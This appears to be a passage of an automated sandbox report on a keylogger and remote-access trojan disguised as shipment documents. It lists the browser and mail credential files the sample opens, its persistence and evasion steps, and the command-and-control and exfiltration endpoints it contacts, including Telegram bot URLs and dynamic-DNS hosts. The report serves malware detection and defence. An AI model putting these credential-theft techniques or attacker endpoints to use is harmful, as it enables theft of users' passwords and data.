                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		1
                Exfiltration Over Alternative Protocol                		Abuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job                		111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		3
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS11
                Security Software Discovery                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Process Discovery                		SSHKeylogging3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture24
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531471 Sample: rShipmentDocuments.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 2 other IPs or domains 2->54 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 12 other signatures 2->72 8 rShipmentDocuments.exe 7 2->8         started        12 ZOlmYtPdlO.exe 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 50->68 70 Uses the Telegram API (likely for C&C communication) 52->70 process4 file5 42 C:\Users\user\AppData\...\ZOlmYtPdlO.exe, PE32 8->42 dropped 44 C:\Users\...\ZOlmYtPdlO.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp44A0.tmp, XML 8->46 dropped 48 C:\Users\user\...\rShipmentDocuments.exe.log, ASCII 8->48 dropped 74 Uses schtasks.exe or at.exe to add and modify task schedules 8->74 76 Adds a directory exclusion to Windows Defender 8->76 14 rShipmentDocuments.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        30 2 other processes 8->30 78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 82 Injects a PE file into a foreign processes 12->82 22 ZOlmYtPdlO.exe 12->22         started        24 schtasks.exe 12->24         started        26 ZOlmYtPdlO.exe 12->26         started        28 ZOlmYtPdlO.exe 12->28         started        signatures6 process7 dnsIp8 56 api.telegram.org 149.154.167.220, 443, 49767, 49773 TELEGRAMRU United Kingdom 14->56 58 185.230.141.85, 21, 49203, 49204 HostingvpsvilleruRU Russian Federation 14->58 60 2 other IPs or domains 14->60 84 Loading BitLocker PowerShell Module 18->84 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        86 Tries to steal Mail credentials (via file / registry access) 22->86 88 Tries to harvest and steal browser information (history, passwords, etc) 22->88 38 conhost.exe 24->38         started        40 conhost.exe 30->40         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                rShipmentDocuments.exe38%VirustotalBrowse
                rShipmentDocuments.exe29%ReversingLabsWin32.Trojan.Generic
                rShipmentDocuments.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe29%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe38%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                reallyfreegeoip.org0%VirustotalBrowse
                api.telegram.org2%VirustotalBrowse
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                https://api.telegram.org1%VirustotalBrowse
                http://varders.kozow.com:808115%VirustotalBrowse
                https://www.office.com/lB0%VirustotalBrowse
                https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                https://www.office.com/0%VirustotalBrowse
                https://www.office.com/p0%VirustotalBrowse
                http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
                http://aborters.duckdns.org:808114%VirustotalBrowse
                http://51.38.247.67:8081/_send_.php?L7%VirustotalBrowse
                https://api.telegram.org/bot4%VirustotalBrowse
                http://anotherarmy.dns.army:808118%VirustotalBrowse
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded7%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		188.114.96.3
                		truetrueunknown
                api.telegram.org
                		149.154.167.220
                		truetrueunknown
                checkip.dyndns.com
                		132.226.247.73
                		truefalseunknown
                checkip.dyndns.org
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
